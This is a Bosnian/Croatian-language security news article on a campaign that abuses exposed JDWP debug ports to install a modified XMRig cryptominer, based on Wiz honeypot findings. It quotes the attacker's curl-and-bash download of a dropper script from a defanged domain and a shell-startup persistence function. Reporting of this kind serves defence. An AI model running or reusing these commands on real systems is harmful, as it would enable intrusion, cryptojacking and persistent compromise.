Nova talas kibernetičkih napada usmjeren je na organizacije koje nenamjerno izlažu Java Debug Wire Protocol (JDWP) servere internetu, a napadači koriste ovu zanemarenu ulaznu tačku za implementaciju sofisticiranog malvera za kriptorudarstvo. JDWP, standardna funkcija u Java platformi, dizajnirana je za olakšavanje daljinskog otklanjanja grešaka, omogućavajući programerima da nadgledaju aplikacije u realnom vremenu. Međutim, kada JDWP ostane dostupan na produkcijskim sistemima, često zbog pogrešne konfiguracije ili upotrebe razvojnih zastavica u okruženjima uživo, postaje moćan vektor za daljinsko izvršavanje koda. Pojava ove prijetnje obilježena je brzim ciklusima eksploatacije; u nekoliko uočenih incidenata, napadači su uspjeli kompromitovati ranjive mašine u roku od nekoliko sati od izlaganja.
Tok napada obično započinje masovnim internet skeniranjem otvorenih JDWP portova, najčešće porta 5005. Nakon identifikacije mete, napadač pokreće JDWP “rukovanje” radi potvrde aktivnosti usluge, a zatim uspostavlja sesiju, stičući interaktivni pristup Java Virtual Machine (JVM). Ovaj pristup omogućava napadaču da nabroji učitane klase i pozove metode, čime se na kraju omogućava izvršavanje proizvoljnih naredbi na hostu. Analitičari kompanije Wiz identifikovali su ovu kampanju nakon što su primijetili pokušaje eksploatacije na svojim “honeypot” serverima koji pokreću TeamCity, popularan CI/CD alat. Napadači su demonstrirali visok stepen automatizacije i prilagođavanja, implementirajući modificirani XMRig kriptorudar sa kodiranom konfiguracijom kako bi izbjegli otkrivanje. Značajno je da malver koristi posrednike rudarskih bazena (mining pool proxies) kako bi prikrio adresu novčanika odredišta, komplikujući napore za praćenje ili ometanje ilegalne rudarske operacije.
Uticaj ovih napada je značajan. Zloupotrebom JDWP, prijetnja akti mogu ne samo implementirati kriptorudare, već i uspostaviti duboko uporište (persistence), manipulirati sistemskim procesima i potencijalno se proširiti na drugu imovinu unutar kompromitovanog okruženja. Prikrivena priroda tereta, u kombinaciji sa sposobnošću da se uklopi sa legitimnim sistemskim uslužnim programima, povećava rizik od produženog nedetekovanog djelovanja i iscrpljivanja resursa. Fokusirajući se na mehanizam infekcije, napadači iskorištavaju nedostatak autentifikacije JDWP-a za ubrizgavanje i izvršavanje školskih (shell) naredbi direktno putem protokola. Nakon uspostavljanja sesije, obično preuzimaju skriptu za pokretanje (dropper script), kao što je logservice.sh, koristeći naredbe poput:
“`bash
curl -o /tmp/logservice.sh -s https://canonicalconnect[.]com/logservice.sh
bash /tmp/logservice.sh
“`
Ova skripta je dizajnirana da ubija konkurentne rudare, preuzima zlonamjerni XMRig binarni kod prerušen u logrotate i instalira ga u direktorijum sa konfiguracijom korisnika. Skripta zatim postavlja više mehanizama za uporište (persistence), uključujući izmjenu početnih datoteka školjki, kreiranje cron poslova i instaliranje lažne sistemske usluge. Sljedeći izvod ilustruje kako skripta osigurava uporište putem konfiguracije školjke:
“`bash
add_to_startup() {
if [ -r “$1” ]; then
if ! grep -Fxq “$EXEC >/dev/null 2>&1” “$1”; then
echo “$EXEC >/dev/null 2>&1” >> “$1”
fi
fi
}
“`
Lanac infekcije je efikasan i otporan, omogućavajući kriptorudaru da preživi ponovno pokretanje sistema i prijavljivanje korisnika. Upotreba imena procesa i sistemskih lokacija koje zvuče legitimno od strane napadača dodatno komplikuje napore za otkrivanje i sanaciju, naglašavajući potrebu za budnim upravljanjem konfiguracijom i robusnim praćenjem izloženih usluga.